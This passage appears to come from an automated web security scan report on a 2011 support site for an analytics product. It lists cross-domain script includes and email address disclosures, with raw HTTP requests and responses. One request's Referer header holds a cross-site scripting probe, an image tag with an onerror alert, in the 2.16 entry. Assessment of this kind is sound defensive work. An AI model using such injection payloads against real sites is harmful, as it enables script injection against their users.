Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:00 GMT
Last-Modified: Sun, 28 Aug 2011 09:24:48 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7228
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.13. http://support.kissmetrics.com/misc/site-settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/site-settings

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /misc/site-settings HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/misc/javascript-settings
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:10 GMT
Last-Modified: Sat, 27 Aug 2011 05:09:35 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7682
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.14. http://support.kissmetrics.com/misc/user-privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/user-privacy

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /misc/user-privacy HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556183; km_lv=1314556184; km_uq=; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:38:45 GMT
Last-Modified: Sat, 27 Aug 2011 01:49:41 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 9978
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.15. http://support.kissmetrics.com/overview/how-is-kissmetrics-different previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/overview/how-is-kissmetrics-different

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /overview/how-is-kissmetrics-different HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/misc/site-settings
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=1314563953%20%2Fs%3Freturning%3D1%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314563953%7C1314563953%20%2Fe%3F_n%3DDouble%2520Wildcard%2520Test%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314563953%7C1314563953%20%2Fe%3F_n%3DTriple%2520Wildcard%2520Test%26_k%3D1c0dbdf3517e39a1141f7bc1e2e34a37cc92e647%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314563953

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:25 GMT
Last-Modified: Sat, 27 Aug 2011 00:20:40 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8931
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.16. http://support.kissmetrics.com/search/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/a

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /search/a HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/search/cookie9d6c0%3Cimg%20src%3da%20onerror%3dalert(%22XSS%22)%3E865391eff4b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:48:31 GMT
Last-Modified: Sun, 28 Aug 2011 20:48:30 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 14708
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.17. http://support.kissmetrics.com/search/cookie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/cookie

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /search/cookie HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/search/xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:53 GMT
Last-Modified: Sun, 28 Aug 2011 20:39:51 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 12570
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

2.18. http://support.kissmetrics.com/search/xss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/xss

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /search/xss HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/overview/how-is-kissmetrics-different
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_lv=1314556184; km_uq=; km_vs=1; km_lv=x; km_uq=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:42 GMT
Last-Modified: Sun, 28 Aug 2011 20:39:41 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 6890
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
</div>
<script charset='utf-8' src='//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'></script>
...[SNIP]...

3. Email addresses disclosed previous
There are 19 instances of this issue:

/
/advanced/a-b-testing
/advanced/server-client-side-integration
/apis
/apis/common-methods
/apis/javascript
/apis/url
/css/screen.css
/getting-started/people-events-properties
/getting-started/products-reports
/getting-started/saas_basics
/misc/api-key
/misc/javascript-settings
/misc/site-settings
/misc/user-privacy
/overview/how-is-kissmetrics-different
/search/a
/search/cookie
/search/xss

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

3.1. http://support.kissmetrics.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 18:30:23 GMT
Last-Modified: Fri, 26 Aug 2011 22:46:17 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 10133
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto:support@kissmetrics.com'>
...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.2. http://support.kissmetrics.com/advanced/a-b-testing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/advanced/a-b-testing

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:20 GMT
Last-Modified: Sat, 27 Aug 2011 00:00:37 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 10539
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.3. http://support.kissmetrics.com/advanced/server-client-side-integration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/advanced/server-client-side-integration

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:59 GMT
Last-Modified: Sat, 27 Aug 2011 17:25:19 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8273
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.4. http://support.kissmetrics.com/apis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:41:01 GMT
Last-Modified: Sat, 27 Aug 2011 01:52:58 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 11348
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.5. http://support.kissmetrics.com/apis/common-methods previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis/common-methods

Issue detail

The following email addresses were disclosed in the response:

bob@bob.com
support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:41:10 GMT
Last-Modified: Sat, 27 Aug 2011 02:39:25 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 13114
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<code>bob@bob.com</code>
...[SNIP]...
<code>bob@bob.com</code>
...[SNIP]...
<code>_kmq.push(['identify', 'bob@bob.com']);
_kmq.push(['record', 'Viewed Homepage']);
_kmq.push(['record', 'Signed Up', {'Plan':'Pro', 'Amount':99.95}]);
_kmq.push(['set', {'gender':'male'}]);
_kmq.push(['alias', 'bob', 'bob@bob.com']);</code>
...[SNIP]...
<code>KM::identify('bob@bob.com');
KM::record('Viewed Homepage');
KM::record('Signed Up', array('Plan' => 'Pro', 'Amount' => 99.95));
KM::set(array('gender'=>'male'));
KM::alias('bob', 'bob@bob.com');</code>
...[SNIP]...
<code>KM.identify('bob@bob.com');
KM.record('Viewed Homepage');
KM.record('Signed Up', {'Plan' => 'Pro', 'Amount' => 99.95});
KM.set({:gender=>'male'});
KM.alias('bob', 'bob@bob.com');</code>
...[SNIP]...
<code>KM.identify('bob@bob.com');
KM.record('Viewed Homepage');
KM.record('Signed Up', {'Plan' : 'Pro', 'Amount' : 99.95});
KM.set({'gender' : 'male'});
KM.alias('bob', 'bob@bob.com');</code>
...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.6. http://support.kissmetrics.com/apis/javascript previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis/javascript

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:08 GMT
Last-Modified: Fri, 26 Aug 2011 22:36:27 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8199
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.7. http://support.kissmetrics.com/apis/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/apis/url

Issue detail

The following email addresses were disclosed in the response:

bob@bob.com
john@smith.com
support@kissmetrics.com
user@domain.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:41:24 GMT
Last-Modified: Sat, 27 Aug 2011 08:10:02 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 10709
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<code>http://yoursite.com/landing?kme=Landing+Page&
 kmi=user@domain.com&km_variation=red+button.</code>
...[SNIP]...
<code>user@domain.com</code>
...[SNIP]...
<code>http://yoursite.com/signup?kme=Clicked+E-mail+Link&kmi=bob@bob.com</code>
...[SNIP]...
<code>bob@bob.com</code>
...[SNIP]...
<code>bob@bob.com</code>
...[SNIP]...
<code>bob@bob.com</code>
...[SNIP]...
<code>http://yoursite.com/1?kme=Clicked+Link&kmi=john@smith.com&km_Link=link+1
http://yoursite.com/1?kme=Clicked+Link&kmi=john@smith.com&km_Link=link+2
http://yoursite.com/1?kme=Clicked+Link&kmi=john@smith.com&km_Link=link+3</code>
...[SNIP]...
<code>john@smith.com</code>
...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.8. http://support.kissmetrics.com/css/screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/css/screen.css

Issue detail

The following email address was disclosed in the response:

dcollins@kissmetrics.com

Request

GET /css/screen.css HTTP/1.1
Host: support.kissmetrics.com
Proxy-Connection: keep-alive
Referer: http://support.kissmetrics.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Dh3cuYrwfedK4cn76jFetAXOg8o%3D; __utma=13310637.1247803125.1314556126.1314556126.1314556126.1; __utmb=13310637.3.10.1314556126; __utmc=13310637; __utmz=13310637.1314556126.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=KISSmetrics; km_uq=1314556176%20%2Fe%3FViewed%2520URL%3Dhttp%253A%252F%252Fwww.kissmetrics.com%252Fcontact%26Referrer%3Dhttp%253A%252F%252Fwww.kissmetrics.com%252F%26_n%3DPage%2520View%26_k%3De4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3%26_p%3DDh3cuYrwfedK4cn76jFetAXOg8o%253D%26_t%3D1314556176; km_vs=1; km_lv=1314556176

Response

HTTP/1.1 200 OK
Content-Type: text/css
Date: Sun, 28 Aug 2011 18:29:49 GMT
Last-Modified: Tue, 12 Apr 2011 14:34:34 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 10970
Connection: keep-alive

/*
Site: KISSmetrics Support
Author: Derek P. Collins, dcollins@kissmetrics.com
Time: 2010-09-14 15:48:20
*/

/* RESET: =reset
------------------------------------------------------------*/
html, body, div, h1, h2, h3, h4, h5, h6, ul, ol, dl, li, dt, dd, p, blockquote, pre, for
...[SNIP]...

3.9. http://support.kissmetrics.com/getting-started/people-events-properties previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/getting-started/people-events-properties

Issue detail

The following email addresses were disclosed in the response:

bob@bob.com
support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:41:18 GMT
Last-Modified: Sat, 27 Aug 2011 02:09:54 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 13923
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<code>_kmq.push(['identify', 'bob@bob.com']);</code>
...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.10. http://support.kissmetrics.com/getting-started/products-reports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/getting-started/products-reports

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:41 GMT
Last-Modified: Sat, 27 Aug 2011 01:49:14 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8059
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.11. http://support.kissmetrics.com/getting-started/saas_basics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/getting-started/saas_basics

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:36 GMT
Last-Modified: Sat, 27 Aug 2011 17:09:17 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 12294
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.12. http://support.kissmetrics.com/misc/api-key previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/api-key

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:40:56 GMT
Last-Modified: Sun, 28 Aug 2011 00:15:31 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7132
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.13. http://support.kissmetrics.com/misc/javascript-settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/javascript-settings

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:00 GMT
Last-Modified: Sun, 28 Aug 2011 09:24:48 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7228
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.14. http://support.kissmetrics.com/misc/site-settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/site-settings

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:10 GMT
Last-Modified: Sat, 27 Aug 2011 05:09:35 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 7682
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.15. http://support.kissmetrics.com/misc/user-privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/misc/user-privacy

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:38:45 GMT
Last-Modified: Sat, 27 Aug 2011 01:49:41 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 9978
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.16. http://support.kissmetrics.com/overview/how-is-kissmetrics-different previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/overview/how-is-kissmetrics-different

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:25 GMT
Last-Modified: Sat, 27 Aug 2011 00:20:40 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 8931
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
